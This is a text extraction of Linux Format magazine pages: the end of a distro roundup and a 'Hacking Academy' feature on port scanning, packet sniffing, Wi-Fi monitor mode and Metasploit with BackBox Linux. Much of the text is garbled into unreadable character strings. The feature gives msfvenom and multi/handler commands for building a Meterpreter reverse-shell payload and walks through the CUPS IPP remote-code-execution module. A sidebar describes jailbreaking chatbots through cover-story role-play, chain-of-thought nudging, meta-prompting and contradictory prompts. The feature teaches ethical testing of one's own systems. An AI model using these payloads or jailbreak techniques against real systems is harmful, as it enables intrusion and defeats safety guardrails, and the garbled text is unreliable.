small convenient features we’re spoiled with are absent. 2nd Gentoo 8/10
Slackware churns along at its own pace and nothing
will ever change it. Perhaps that’s why we like it so much. Web: www.gentoo.org Licence: Various free software licences
The Linux distro fundamentals we’re now used to were Version: Gentoo Base System release 2.17
originally laid down by Slackware and its contemporaries. Ultimate tweaker’s distro. High level of compilation control. Educational.
It’s not that different from any modern distribution in how
you install it, save for the text-mode interface and some 3rd Slackware 7/10
manual partitioning at the beginning. The fact that it
$&3"06,202 %0& 0601"*1,2&)!,++!*00"0,# Web: www.slackware.com
package selection options during installation means that Licence: Mostly GPL Version: 15.0
you can take it in whatever direction you fancy. Fairly easy to install. Traditional Linux. Oldest currently maintained distro.
NixOS has an intriguing premise as a declarative
system. Editing one text file for the configuration and 4th NixOS 7/10
installed packages, then carrying out the installation from
that makes a lot of sense, and we wonder if that approach Web: https://nixos.org
,2)!" ,*"-,-2)/,+,1%"/0601"*0o%"!,4+0&!"0 Licence: Various mostly free licences Version: 24.11
are that it’s impossible to guess how the configuration file Declarative. Reproducible customisations. Can regress to earlier configs.
(and its underlying language) works and it’s more effort to
do something simple, such as adding a new package. 5th Void Linux 7/10
Void Linux does what it sets out to. It gives you a
manually installed, lightweight Linux base that you can Web: https://voidlinux.org Licence: Various mostly free licences
build on. Apart from the package manager, it presents Version: Rolling release, updated 19th Jan 2025
fairly standard tools that are easy to manually configure. Lightweight. Offers basic starting point. Designed for manual configuration.

ALSO CONSIDER
Debootstrap is a utility that can install a Debian-based Linux Linux From Scratch isn’t a distribution as such. It’s a set of
system from within another running distribution, much like instructions to build up a Linux installation manually. In theory,
the installation procedure of the power-user distributions you learn a lot about how Linux works while you’re doing it.
we’ve looked at here. Bedrock Linux describes itself as a meta distribution, and it
CRUX Linux is manually installed and configured and was makes it possible to mix components from different distros.
one of the inspirations behind Gentoo Linux and Arch Linux. The website gives an example of using Debian’s Core Utilities,
Unfortunately, its future is uncertain as the original maintainer Arch’s kernel, a PDF reader maintained with Gentoo’s Portage,
has left the project and the last update was in 2022. and games running against Ubuntu’s libraries. Woah!

www.techradar.com/pro/linux April 2025 LXF326 31

Hacking Academy

/014%&)" !"*& Jonni Bidwell

1/+0*21"!%&0&3,/61,4"/,,(
0*/10&+1,);;1% ("/(+,4)"!$"o
+!%"}0%"/"1,-00&1,+o
ver wanted to be a hacker? Of course

E 6,2!&!n1%1}04%66,2$,1&+1,&+25o/
*6"&140" 20"&+!,40&01,,
"5-"+0&3"o&1%"/46n4"}/"%"/"1,1" %
6,20,*"% ("/1/& (0o ,-"#2))6+,1+61%&+$1%1}))
$"16,2&+1/,2)"ƒ1%1}02-1,6,2„n21 "/1&+)6
0,*"1" %+&.2"06,2 +20"/&$%1+,41,1"01
0" 2/&16,+6,2/%,*"+"14,/(,//"*,1"0"/3"/0o
"}))&+1/,!2 " (,5n!&01/,!"!& 1"!1,
-"+"1/1&,+1"01&+$n0" 2/&16/"0"/ %+!% (&+$o
1}0$,1"3"/61%&+$6,2+""!ƒ+!-/,)6),16,2
!,+}1„1,"$&+6,2/!3"+12/"0o"}))01/14&1%-,/1
0 ++&+$x-/1,#1%"&+#,/*1&,+v$1%"/&+$-%0",#
+611 (x1,#&+!,214%10"/3& "0/"/2++&+$,+
6,2/* %&+"0o ,/1%&04"}))20"Nmap (Network
Mapper, 0#"12/"!&+1%"#&)*0The Matrix Reloaded
and Elysium),+"00"+1&)-/1,#+6% ("/}0/0"+)o
%"+4"}))*,3",+1,*,/"!3+ "!+"14,/(
/" ,++&00+ "x20&+$EtherApe 1,!&0-)6+"14,/(
1/##& &+/")1&*"o,1 ,+1"+14&1%1%1n4"}))),,(1
- ("10+&##&+$4&1%Wireshark+!1%"+4"}))"3"+
%3"$,1 /#1&+$,2/,4+/"*,1" "001/,'+
4&1%Metasploito%+!'201#,/$,,!*"02/"n4"}))
use Metasploit$&+ƒ&1}0+,1%"/"00"+1&)1,,),#
1%"1/!"„1,1/61,11 ( (,5&10")#o"/"
/")"+1)"00o+!1%"/"}0*,/"n1,,n0,$//"4
+!$"1% (&+$j 201!,+}1$"1&++61/,2)"o
+!&#6,2!,n!,+}11"))+6,+"4%,1,)!6,2
%,41,!,&1o)"0"o
CREDIT: Magictorch

32 LXF326 April 2025 www.linuxformat.com

 Hacking Academy

Hacking origins
Some musings on the hacker archetype and today’s common
misconceptions about the practice. Plus an intro to BackBox.
e’ve given up trying to tell Management about BackBox uses the

W the original meaning of hacking. Namely that it

has its origins in electronics buffs repurposing
Ubuntu installer,
so getting it
installed is
their hardware (which, in the earliest instance, was ­ǏÅĨÐÐřÐƧ
model railways) to do things it wasn’t designed to do.
Today’s hackers still mess around with hardware, but
also software, too. We dare say a good portion of the
developers of major open source projects would
consider themselves hackers – there’s a certain
creativity to getting different tools and frameworks to
play nicely with each other. Or getting C programming
language to do exactly what you want. But none of this
will sway Management’s or indeed mainstream media’s
view that hackers are nefarious behoodied types intent
on mayhem, theft and other vituperative acts.
In this feature, we’re not going to cause any stopping you using this knowledge on other people’s
mayhem at all, and even though we’ll look at some of machines, but bear in mind we haven’t told you how not
the techniques and tooling those ne’er-do-well black to get caught. Most server administrators turn a blind
hat hackers use, we’re going to stay on the right side of eye to port scans (the Shodan website carries them out
the law. While we’re pontificating, though, here’s an automatically and is an invaluable security resource),
interesting fireside take. Visionary author and futurist but if you do get caught doing something a bit more
Cory Doctorow (who we had the star-struck pleasure aggressive, don’t say we didn’t warn you.
of interviewing back in LXF222) points out that
Odysseus (King of Ithaca and also known as Ulysses)
was the OG hacker. He found a way of circumventing GETTING BACKBOX
the usual going-mad-and-forgetting-oneself effect
that the mysterious Sirens’ song usually had on sailors. We won’t hand-hold you through the whole process of writing and
"%!%&0 /"4-)2$1%"&/"/04&1%45ƒ1%" "-1"! booting the BackBox ISO file. It’s around 6GB and you can find it
protocol for sailing past Siren island) and had them 1%11-0pšš)&+25o (,5o,/$š!,4+),!š. BackBox is funded by
)0%%&*1,1%"*01n0,%" ,2)!%"/1%",1%"/4,/)!)6 donations, but you can enter 0 in the donation field if you don’t (yet)
melody and be immune from the desire to plunge into want to contribute. Once you’ve downloaded it and written it to a
the waters and meet otherworldly sonorous doom. USB stick (using either Etcher, see %11-0pšš"1 %"/o&,, or something
else), fetch a cup of tea and boot it up. It jumps into a stylish Xfce live
BackBox to front environment, from which you can start your hacking endeavours.
Usually when we cover hacking, penetration testing, Like Kali Linux, there is an option to install BackBox, but this isn’t
security and things of that ilk, we base our efforts necessary. Neither distro should be used as a daily driver, but you
around Kali Linux (444o()&o,/$). Kali is a Debian-based might want to install them if you need to use GPU-accelerated
distro that comes jam-packed with everything you password cracking, or generate a lot of data that you don’t want to
need to start your (non-crimey) hacking career. For this lose on reboot. And if you need newer versions of any tools that ship
outing, we’re changing things up a bit and switching to with BackBox, installing it saves having to update them repeatedly.
BackBox Linux (%11-0pšš)&+25o (,5o,/$). If you’re From the menu in the top-left, you’ll find the Auditing submenu. It’s
familiar with Kali, you can follow along with our voyage, in here that you’ll find all the specialist tools, neatly categorised, to
since it includes all the tools we’re going to cover. But begin our foray into the world of (ethical) hacking.
it’s always nice to try something new. BackBox is based
on Ubuntu, and fairly uniquely among Ubuntu offshoots
has the Launchpad repository (where new Ubuntu
packages are tested) preconfigured. So, you don’t need We gave our user a
faff around with PPAs in order to get the latest tools. hoodie-appropriate
moniker when we
Before we begin, let’s just reinforce that while some
ìĆĬij­ÿÿÐÌǎ­ÆüČŐƧ
people do get paid to hack or social engineer their
46&+1,-) "01%"60%,2)!+}1")),4"!1,n!,&+$1%&0
without authorisation might land you in a lot of trouble.
We’re going to show you how you can ping, probe and
prod your own hardware and networks. There’s nothing

www.techradar.com/pro/linux April 2025 LXF326 33

Hacking Academy

Port scanning
Get started with port scanning and probe your systems
with Nmap – the bread and butter of pentesting.

f you were, hypothetically, going to hack a

I machine, or indeed if you wanted to check

1%"0" 2/&16,#* %&+"2+!"/6,2/ ,+1/,)n
1%"#&/011%&+$6,2*&$%1!,&00""4%10"/3& "0&1&0
running. An internet-facing machine may be running
4"0"/3"/ƒ02 %0- %",/$&+5„n0,*"3/&+1
of SSH (Secure Shell, for remote textual logins), a
database (such as MariaDB, but it shouldn’t be
accessible from the outside world) or any number
,#,1%"/*,/",0 2/"0"/3& "0o"3& "0,+6,2/ƒ,/
someone else’s) LAN (which on the whole shouldn’t be
accessible from the internet at large) might be running
print servers, file sharing (such as a NAS box), Internet
of Things (IoT) gateways or anything else you’d care to
name or run. These services all work by listening on a
particular port and waiting for clients to connect.
A web server is often used to serve public websites,
and so doesn’t need any kind of explicit authentication
mechanism. But, in general, most other services should
be locked down to prevent any kind of unauthorised
access. This is often done by limiting access to
particular IP addresses, some kind of public key
,/ "/1&#& 1"&+#/01/2 12/"n,/$,,!,)!v#0%&,+"! Besides Nmap, you’ll find a ton of other tools in BackBox’s Auditing
usernames and passwords. But we’re getting ahead ĬķÅąÐĆķƧǎVČĬijǎČãǎijéÐąǎ­ĨÐǎäÿČĨìČķĬǎÆČąą­ĆÌƽÿìĆÐǎ­ãã­ìĨĬƧ
,#,2/0")3"0o #4"4+11,0""ƒ4&1%,21-/&,/
knowledge) what services are running on a given an alert if some kind of intrusion detection system is
machine, we perform what is known as a port scan. installed on the target network. In and of itself, cursory
That is, we attempt to initiate a connection to some port scanning shouldn’t get you in any kind of legal
,#)),#&10-,/10o trouble, but you might find your IP address temporarily
The TCP and UDP protocols that run on top of IP blocked if you are persistent about it. Or if you’re
(Internet Protocol) each allow machines to listen on foolish and target hosts ending in .mil or .gov.
2-1,>=n=;=-,/10ƒ+2*"/"!9v>=n=;=„n0,+&3" The undisputed champion of port scanning is a
approach would be to just enumerate all of those and command-line tool called Nmap. Despite its immense
see what we find. Without specialist tools, this is quite power, it’s surprisingly easy to use. Let’s say you’re
time consuming. And also quite noisy – such a scan 1%,*"+!6,2}/" ,+ "/+"!,211%"0" 2/&16,#
would be very visible in system logs and might trigger your home router, which we’ll say has the IP address
9A:o9>@o8o9ƒ1%&0&0 ,**,+n216,2/0*&$%1"
something different). Then you can scan it by opening
WHAT ARE U(DP) LOOKING AT? a terminal (in the Favourites section of BackBox’s main
menu) and running nmap 192.168.0.1 . This scans the
So far, we’ve only discussed TCP connections. The other species, thousand most common TCP ports and very quickly
UDP (Unified Datagram Protocol), is a lightweight affair used for returns a list of what’s running. In our case, it gave us
streaming, VoIP and video conferencing. Slightly confusingly, it’s the following:
known as a connectionless protocol, because the client doesn’t map scan report for home (192.168.0.1)
%3"1,4&1#,//"0-,+0"#/,*1%"%,01&+,/!"/1,0"+!!1ƒ&1 Host is up (0.050s latency).
just might be sending it into the void if the host isn’t listening). To Not shown: 997 closed tcp ports (conn-refused)
scan UDP ports with Nmap, we need to use a different syntax, and PORT STATE SERVICE
indeed a whole different scan type that requires root privileges: 53/tcp open domain
$ sudo nmap -sU 192.168.0.1 80/tcp open http
If you’re using Ubuntu and have Nmap installed as a Snap, you 443/tcp open https
must run sudo snap connect nmap:network-control to allow it to The last three lines tell use that the router runs a
access the network hardware directly. BackBox doesn’t need this. DNS server and a web interface. The latter listens on
Our router did not seem to be running any UDP services beside DNS. 14,-,/10x@8#,/2+"+ /6-1"! ,++" 1&,+0+!<<;
for encrypted ones. Since our router doesn’t have a

34 LXF326 April 2025 www.linuxformat.com

 Hacking Academy

domain name attached to it, there isn’t a sensible way

to generate an HTTPS certificate for it, so there’s AI ALCHEMY
nothing concerning about allowing unencrypted
access. This is data that’s only flowing over the LAN What with all the excitement around AI, it’s worth mentioning that
after all. If you want to remotely administer your router, ChatGPT and friends have all been subject to jailbreaking. That is,
that’s a different story. But anyway, we digress. Our making them talk about things they’re not supposed to, use rude
router is running exactly what a router should be words, or potentially worse. There’s a whole community dedicated to
running. So, let’s widen our scope a little. this nefarious art at 444o/"!!&1o ,*š/š%1  &)/"( and we
We might want to scan our entire LAN, and this is encourage you to take a look. For research purposes of course.
easy with Nmap. Assuming the same network layout AI prompt injection involves using misdirection and subterfuge in
0"#,/"n4" + %&"3"1%&04&1%4&)! /!x#,/ the input prompt, which makes the AI ignore certain guard rails. This
example, nmap 192.168.0.* o%&00 +0)):==  might involve telling the AI to act as a different character with a
addresses with the given prefix. If you want to scan cover story (such as a middleman between a whistle-blower and a
beyond the common ports, you can specify a port journalist). New LLMs use chain of thought (CoT) reasoning, and you
range as follows: can nudge this chain in a certain direction. Another way to stop the
$ nmap 192.168.0.1 -p 1-65535 AI uprising is meta-prompting. This might involve discussing how
That would scan the host on every TCP port, which rules might be avoided without specifically asking for instructions.
for our router didn’t reveal anything new. So, let’s look Finally, we can attempt to confuse LLMs. Like Thief of Time (the
at what it is running using its version detection option: Terry Pratchett story where fastidious but literal-minded auditors are
$ nmap -sV 192.168.0.1 trapped by a left arrow with instructions to keep right below), we can
This probes each service and matches the response just outright confound AI into speaking freely with contradictory
against Nmap’s service database, which in many cases prompting. This is known as context manipulation.
can tell you exactly what’s running. If it can’t, you can
submit corrections at %11-0pšš+*-o,/$š02*&1. In our
case, it was able to identify the Huawei web interface server. So, let’s probe it explicitly and directly:
running on the router, and that something called $ sudo nmap -p 53 -sU -A 192.168.0.1
tcpwrapd40/2++&+$,+-,/1=;n4%"/"4"}!"5-" 1 We see a domain service is indeed running, as well
to find DNS. TCP Wrapper controls access to services, as abstruse details about its resolver configuration and
so what’s really happening here is the probe is some strings from its fingerprint. In our case, Nmap still Nmap is so popular
that its website
encountering tcpwrapd, which would normally forward couldn’t identify the service exactly, and asked us to
has a page keeping
the connection request to the underlying DNS server submit its fingerprint to its database. We would do track of the movies
(which runs over UDP). To investigate further, we could that, but we don’t know what it is either. ìijLJĬǎ­ĥĥЭĨÐÌǎìĆƧ
run the previous scan as root, which will use its stealth
TCP scanning mode. In our case, this didn’t yield Tux’s Challenge!
anything further about the DNS service, but when If you have a home server, or even a remote one or a
4"0 ++"!))-,/10$&+n4"#,2+!20"/3& " VPS, use Nmap to see which ports are open and what
/2++&+$,+-,/1;?:9=o,n4"1/&"!"+)&+$))1%" services are running on them. For file servers, NAS
advanced features (which includes version detection): boxes and the like, see what version of the Samba
$ nmap -A 192.168.0.1 file-sharing protocol they’re running. If you want to
This showed us some more information about the experience the thrill of port scanning a remote
(self-signed) certificate used for HTTPS, and some machine that doesn’t belong to you, risk-free, point
very generic information about the running OS (Linux) Nmap at %11-pšš0 +*"o+*-o,/$. The Nmap team set
and kernel version. But nothing further about the DNS this up to help people use its tools. Isn’t that kind?
Nmap output does
not make for the
most eye-catching
of screen grabs,
but it contains
juicy information
ĆČĆÐijéÐÿÐĬĬƧ

www.techradar.com/pro/linux April 2025 LXF326 35

Hacking Academy

Network recon
Explore the Zenmap GUI, look at network traffic with
EtherApe, and sniff packets with Wireshark.

f you want to defend your own

I network, and indeed if you’ve

just broken into someone else’s
network, you’ll want to map out all the
machines and services running on there.
Nmap does this (it’s literally short for
Network Mapper), but we want to go
further. The natural next step is Zenmap,
Nmap’s official GUI. This isn’t installed
&+ (,5216,2 +/"*"!61%&0
(on any Ubuntu-based distro) with sudo
apt install zenmap . That adds an icon
1,6,2/--)& 1&,+0*"+2ƒ&+ (,5n
&1}0&+1%" +1"/+"102*"+2„o #6,2!,+}1
run it using the ‘as root’ option, you get a
warning about some scan types not
being available, as we covered and ©ÐĆą­ĥǎČķijĥķijǎìĬĆLJijǎąķÆéǎąČĨÐǎìĆijÐĨÐĬijìĆäǎijé­ĆǎWą­ĥLJĬƨǎÅķijǎìijLJĬǎЭĬìÐĨǎijČǎüÐÐĥǎijĨ­ÆüǎČãƧ
which we’ll go into more detail about.
The Zenmap interface is easy to navigate and keeps Charity, and port scanning, begins at home. So,
track of every scan it performs in the Hosts column on before you look more thoroughly at what other
the left. The Profile drop-down enables you to choose machines are running, why not study what services are
between scan types and the Command box shows )&01"+&+$,+6,2/* %&+"l%" !!/"009:?o8o8o9
ƒ+!)"106,2!& 11"„1%"-/*"1"/01%1Nmap will ƒ+!+61%&+$"$&++&+$4&1%9:?„&020"!1,/"#"/1,1%"
")2+ %"!4&1%o + &!"+1))6n1%"v option (used in local machine on the loopback interface (aka localhost).
*+6,#1%"&+ )2!"!-/,#&)"0„&020"!1,)&*&11%" Services listening on these ports aren’t visible to the
!")6"14""+ ,++" 1&,+11"*-10n0-""!&+$1%&+$0 LAN (unless they’re also listening on the LAN interface,
up. It still takes a couple of minutes to scan all ports which you can check yourself). Type localhost in the
+!!,0"/3& "!"1" 1&,+,+* %&+",+6,2/+"14,/(n target box and do a slow comprehensive scan. This
1%,2$%o,2 +03"1%"/"02)10,#+6/"3")&+$0 +0 spits out lots of output in the main panel. This scan runs
you do from the Scan menu in the top-left. several Nmap scripts, many of which fail (due to missing
API keys, for example) but do not concern yourself with
that at this stage. Once the scan completes, scroll down
WIRELESS SNOOPING and you’ll see what’s running.

In order to see IP traffic on a WPA-encrypted network, Wireshark Ports of call

needs to know the key for that network, unless you want to have a + (,5}0 0"n4"#&+!+ 0"/3"/ƒ-,/1::„n1%"
go at cracking WPA. Symptoms of it not knowing the key include &+!!"*,+ƒ-,/1999„+!1%"-/&+10"/3& "
1%"Wireshark ,)2*+0%,4&+$*,01)6@8:o99- ("10o,2 +1")) ƒ>;9„oZenmap also tells us something about the SSH
&/"0%/(1%"("6&+!&1–/"#"/"+ "0–/,1, ,)0–@8:99o)& ( configuration and RPCBind version. For CUPS, it evens
1%"!&1211,++! %,,0"-v-4!ƒ&#6,2}/",+:,/; tell us the URLs used by its web server. Again, don’t
network protected by a password). Enter the password, followed by a worry, this isn’t visible to the rest of your network, let
colon, followed by the network name. alone the internet. There are plenty of other types of
In order to decrypt those packets, we also need to capture the scan outside of Nmap’s scope.
so-called four-way handshake between the wireless router and Another useful but sadly not so oft-maintained
1%"!"3& "4"}!)&("1,0+,,-,+o ,/ &+$1%")11"/1,!&0 ,++" 1  1,,)&0EtherApe. It’s a passive network traffic
+!/" ,++" 1&+&1&1"01%"%+!0%("o%"0"- ("10/"+""!"! analyser. So, it can tell you an awful lot about your
because the handshake generates a temporal key from the network just by sitting there listening. Best of all, it
passphrase and random data, and it is this temporal key that is displays a stylish real-time map showing all the hosts
actually used to encrypt the traffic. Strictly, only two of these four and colour-coordinated communication between them.
handshake packets are required, but chances are if you catch two, Install and run it like so:
6,2})) 1 %1%",1%"/14,04"))o,2 +0""&#6,2$,11%"*6 $ sudo apt install etherape
filtering the Wireshark log with EAPO – Extensible Authentication $ sudo etherape
Protocol Over LAN, if you must know. ,2+""!1,/2+&10/,,10,&1 +0+&##+"14,/(
packets off the wire, or off the airwaves if you’re using

36 LXF326 April 2025 www.linuxformat.com

 Hacking Academy

It’s highly
satisfying watching
EtherApe do its
real-time traffic
ŊìĬķ­ÿìĬ­ijìČĆǎijéìĆäƧǎ
A static image
Æ­ĆĆČijǎÆČĆŊÐőǎìijƧ

Wi-Fi. Thanks to how Ethernet works, a network Now we attempt to engage monitor mode and
adaptor in promiscuous mode can see all (up to the reactivate the link:
nearest router anyway) packets on that network. $ sudo iw wlp1s0 set type monitor
%&0*"+01%14%"+6,2#&/0101/1 EtherApe, on $ sudo ip link set wlp1s0 up
+"3"+*,!"01v0&7"!+"14,/(n6,2}))-/,)6" If you don’t see an error, that’s a good sign, but sadly
overwhelmed with connection data. If you want to be not a guarantee of success. Start Wireshark and select
less overwhelmed, go into the preferences and change the wireless interface. Now tune the device to the
the Capture Filter from IP Or IP6 to just IP. This way we correct wireless channel (use a mobile app like Wifi-
won’t see any IPv6 connections or addresses. Analyzer, 3&))",+ v/,&!n&#6,2}/"+,102/"x9n>
The bread and butter tool for packet sniffing is +!99/" ,**,+ %++")0„p
Wireshark. ,2}))#&+!&1&+ (,5}0 +1"/+"1*"+2o # $ sudo iw dev wlp1s0 set channel 1
you’re running it from the live media, you can start it If Wireshark doesn’t capture anything, it’s possible
and point it at your network interface right away. If monitor mode is not really supported. This happened to
you’re running on Ubuntu, you can install it with sudo us, but fortunately there is a guide to suitable adaptors
apt install wireshark . It asks you if you want to add coming up (page 40), so we shan’t grumble – instead
6,2/20"/1,1%"4&/"0%/( group, which you should say we’ll plug in a cheap LXF-endorsed USB adaptor and be
yes to. It grants raw packet capture privileges to the on our way. See the box (opposite page) for a primer on
program. This change usually needs you to log out and snooping on encrypted wireless networks.
log in before it takes effect, but a handy trick for the To put everything back to how it was and restore
impatient is to run newgrp wireshark . Either way, once your internet connection, use:
it’s loaded, hit the threatening shark fin button in the $ sudo ip link set wlp1s0 down
1,-v)"#11,01/1 -12/"o,2}))0""))(&+!0,# ,),2/v $ sudo iw wlp1s0 set type managed
coded traffic at various layers in the transport stack. $ sudo systemctl start NetworkManager These are the EAP
If you’re on a wireless network, Wireshark shows packets you need
6,2))1%"- ("10&1 +0"",+1%1+"14,/(o ,4"3"/n Tux’s Challenge! if you want to
decrypt wireless
with a bit of legwork, it’s also possible to see packets Get your wireless device to work in monitor mode, ijĨ­ããìÆƧǎ
ĆÌǎőČķǎ
,+,1%"/+"14,/(0o%&0/".2&/"04&/")"00!"3& " capture the four-way handshake and snoop on your need the password
1%1&0 -)",#*,+&1,/*,!"ƒ0,*"1&*"0 ))"! own wireless network. ijČČƧǎ?ijLJĬǎĆČijǎã­ìĨƧ
promiscuous mode) on Linux. In this mode, the device
doesn’t associate with an access point; instead, it sniffs
what packets it can as they pass through the air. We’ll
use the laconically named ip and iw tools to set things
up. First close Wireshark and run ip a to get the
interface name for your wireless device. In order to put
that interface in monitor mode, we first have to shut it
down (depriving you of network access). Network
Manager will constantly try to take back control of the
interface, so we’ll shut it down, too. Replace wlp1s0
with the name from the previous command:
$ sudo systemctl stop NetworkManager
$ sudo ip link set wlp1s0 down

www.techradar.com/pro/linux April 2025 LXF326 37

Hacking Academy

Metasploit playground
Test your system for known vulnerabilities, try to backdoor it,
and almost discover a vulnerability in BackBox. Fun!

alicious hackers might use all kinds of

M techniques to foist their malware on to

unsuspecting targets. Getting a payload
(something that an attacker wants to execute on a
target machine) into a well-protected target network
might not be as simple as adding a dodgy attachment
to an email. Don’t get us wrong, this (and sending
malicious links) still works a lot of the time. But if a
target is too canny (with the filters, firewalls and what
have you) for these techniques, then some additional
know-how is required. This might involve exploiting
some vulnerability that an attacker has inside
knowledge of, or it might involve paying an initial-
access broker for login credentials.
Once inside a network, our intrepid attacker needs VÐij­ĬĥÿČìijǎäĨ­ÆÐĬǎőČķǎŋìijéǎ­ǎÌìããÐĨÐĆijǎ
}??ǎ­ĨijǎÅ­ĆĆÐĨǎ
some means of executing the payload. That payload ÐŊÐĨőǎijìąÐǎìijǎĬij­ĨijĬǎķĥƧ
might be anything from an information stealer or
something that tries to delete everything (a wiper) to machine is listening for the call, so it circumvents basic
ransomware or something to gain more persistent firewall protections (since they might only block
access. Whatever the final goal, the excitement often incoming connections). Once it picks up, the attacker
begins with a reverse shell. This is something that gets shell access and can execute commands on the
inadvertently gets executed on a target that causes remote machine. It might be a Bash shell, a Powershell
it to call out to an attacker-controlled machine. That shell, or maybe a bespoke shell coded in any language
supported on the machine (for stealth).
In order to get past IDSes (intrusion detection
BUILDING A CUSTOM EXPLOIT systems), reverse shells and payloads in general are
often obfuscated and divided into stages. So, a simple
Who says Linux doesn’t get malware? We’re going to go ahead and Netcat (a lightweight, hardcore tool for sending data
build some. Except don’t worry, it won’t cause any unintended harm. across networks) connection might end up executing
Rather it’ll show you how a reverse shell works and give you hands- Meterpreter, a tailor-made shell from the Metasploit
on payload engineering. We’ll first use Metasploit’s multi-handler to project, that has all the bells and whistles an attacker
get our BackBox machine listening for Meterpreter connections: (or penetration tester) so covets (such as encrypted
msf6> use multi/handler traffic, or the ability to manipulate event logs or even
The prompt will change. The multi-handler is used to manage use custom extensions). In order to get a privileged
connections from any payloads. Type show payloads to see them all. reverse shell, some exploit code might be included in
Now select the Meterpreter shell with: its payload. In this case, an unpatched vulnerability
> set payload linux/x86/meterpreter/reverse_tcp (either due to admin fatigue or being a new, so-called
Now we need to bake in our IP address (use localhost if you don’t 7"/,v!632)+"/&)&16„,+1%"1/$"1* %&+"&0
feel like trying this over your LAN) and a port our ‘malware’ can use exploited, in this case to do privilege escalation.
to connect to us. Let’s say: The Metasploit Framework #/,*-&!?&0
set LHOST 192.168.0.100 community-developed tool that helps security
set LPORT 4444 researchers (or the curious) with penetration testing
exploit work. It contains a database of disclosed vulnerabilities
There, our machine is now listening for Meterpreter connections. and exploit code, so budding threat analysts can craft
Now we use MSFVenom to forge the TCP witchcraft that we’ll run on payloads to their hearts’ content. And then simulate
the target machine. Open a new terminal and run: attacks exactly as they take place in the real world.
$ msfvenom -p linux/x64/meterpreter_reverse_tcp --format elf Metasploit, being one of the most talked-about bits of
LHOST=localhost LPORT=4444 > malware.run hacker tooling, is included with BackBox. It’s listed as
Put the *)4/"o/2+ file on your target machine (no, we won’t tell Msfconsole in the main menu. Fire it up, then follow the
you how to do this if you didn’t have access to that machine). Then instructions in the box (left) to craft your own payload.
run it with ./malware.run and go back to Metasploit on our BackBox If you’ve installed BackBox, answer yes to creating a
* %&+"o,20%,2)!0""*"00$"06&+$1%1Meterpreter new database – this saves you time in the long run.
session has been opened, and you are now free to pwn yourself. Besides using Metasploit to build handy reverse
shells, we can use it to test our machine is not

38 LXF326 April 2025 www.linuxformat.com

 Hacking Academy

vulnerable to any recent exploits

0-,11"!&+1%"4&)!o,2 +#&+!)&01
,#1%"0"11%"-&!?!10"1
%11-0pšš/-&!?o ,*š!. This shows
6,2+,1,+)6&+#,/*1&,++! ,**,+
vulnerabilities and exposure (CVE)
numbers, but also if any corresponding
exploit code is available for Metasploit.
,/"5*-)"n&+"-1"*"/:8:<n
vulnerability was disclosed in the
Common Unix Print System (CUPS),
which allows remote code execution
(RCE). Since CUPS is, er, pretty
common, and RCE exploits are pretty
serious, this one got quite a lot of
attention. Did we say one? It’s actually
four separate CVEs. Don’t worry, they
don’t affect default configurations (and
you’ve updated your system since
:8:<n%3"+}16,2l„o211%"6 +" %&+"! framework . Now start it up as before and invoke the }ÐĥijÐąÅÐĨLJĬǎ
disclosure
1,$"1%"/+!1%"/"&+)&"01%"!+$"/o RCE exploit module with: of several
There’s a great write-up of this at %11-0pšš msf6 > use exploit/multi/misc/cups_ipp_remote_code_ vulnerabilities in
0" 2/&16)0o!1!,$%.o ,*š/1& )"0š"*"/$&+$v execution ‡v}ǎĥĨČÅ­Åÿőǎ
32)+"/&)&16v 2-0. And if you follow along with the We need to set at least one parameter first (you can caused sleepless
nights for
diagnosis there, you’ll see that BackBox (even the see the others by entering show options . The exploit
ĬÐÆķĨìijőǏijЭąĬƧ
version we’re using as we write this) has a sufficiently works by sharing a malicious printer, so we tell it our
new 2-0v/,40"! package to not be affected by this. LAN IP address. This will be published over CUPS so
Which is almost a shame, given the foreshadowing we other machines on the network can see it.
gave the CUPS service earlier on in this adventure. But > set SRVHOST 192.168.0.10
let’s pretend like BackBox is indeed vulnerable so we > exploit
can see how the exploit works. ,2}))0""*"00$"06&+$1%1,$20-/&+1"/
+,/!"/1,$"11%"*,!2)",+ (,5An4"+""! called /&+1, is being shared. In theory, we could
to first update Metasploit from the version included on ‘exploit’ this locally, too. But if you open the Print dialog,
the ISO, so do that with sudo apt install metasploit- (from BackBox’s text editor or web browser, for
example), you’ll see no sign of this PDF printer. If we
did, and we sent it something to print, it would end
2-"5" 21&+$,2/-6),!o%1*&$%1%3"""+
anything, but as we left it as is, the module chose the
Meterpreter shell for us. We tried messing with the
š"1 š 2-0š 2-0v/,40"!o ,+#file to try to reactivate
the older printer sharing protocol. But, alas, the Ubuntu
team had already patched that one up. And with that,
we don our black hoodie, pull the drawstrings tight, and
disappear out into the spring sunshine. We trust your
hacking endeavours will be fruitful, helpful and ethical.

Tux’s Challenge!
+01))1%",)!n32)+"/)"3"/0&,+9o>,#,++
It may not look like much, but many a hacker would emit a joyful Ubuntu (or whatever) VM, then install Metasploit and
ĬÆĨЭąǎČĆǎĬÐÐìĆäǎ­ǎVÐijÐĨĥĨÐijÐĨǎĬÐĬĬìČĆǎĬĥ­ŋĆƧ see if you can have more hacker success than we did.

THE VULNERABLE AND THE DAMN VULNERABLE

If you want to experiment scripting (XSS) and cross- Once you’ve got it set up, learning resource today, not
with something where 0&1"/".2"01#,/$"/6ƒ „o however, which is absolutely least because it features
exploits work, then the See the project’s GitHub at do-able in BackBox, you’ll security levels ranging
*+2)+"/)"" %11-0pšš$&1%2o ,*š!&$&+&+'š find any number of tutorials #/,*,41, *-,00&)"o%"
Application (DVWA) is exactly . It’s too complex to online featuring the myriad so-called Impossible ones
what it sounds like. It’s been give an overview in this small different ways it can be aren’t really impossible, but
/,2+!0&+ ":88A+!&0 box, because setup alone broken. See %11-0pšš 0-+&0o are meant to mimic a real-
great for learning about web involves configuring your $&1%2o&,š-,010švv world environment where
exploitation techniques such own web server, or at least +'" 1&,+š, for example. exploiting these things is
as SQL injection, cross-site running Docker. DVWA remains a great generally pretty difficult.

www.techradar.com/pro/linux April 2025 LXF326 39

Hacking Academy

Hacker-friendly Wi-Fi
1"/(" guides you through choosing the right wireless
device so you can hack with the best of them.

f you want to be a serious

I ethical hacker, it’s crucial

to have the right tools.
Chief among these is a USB Wi-Fi
adaptor that supports commonly
used penetration testing tools such
as the Aircrack-ng suite.
The internal Wi-Fi card in
6,2/)-1,-,/&02+)&(")61,"
suitable. Firstly, this is because
you’ll probably want to remain
connected to your chosen wireless
network while you’re engaging in
"1%& )% (&+$o,2/2+!)"!&v &
card also won’t necessarily be
compatible with pentesting distros
such as Kali or BackBox.
,2/#&/01 ,+0&!"/1&,+4%"+&1
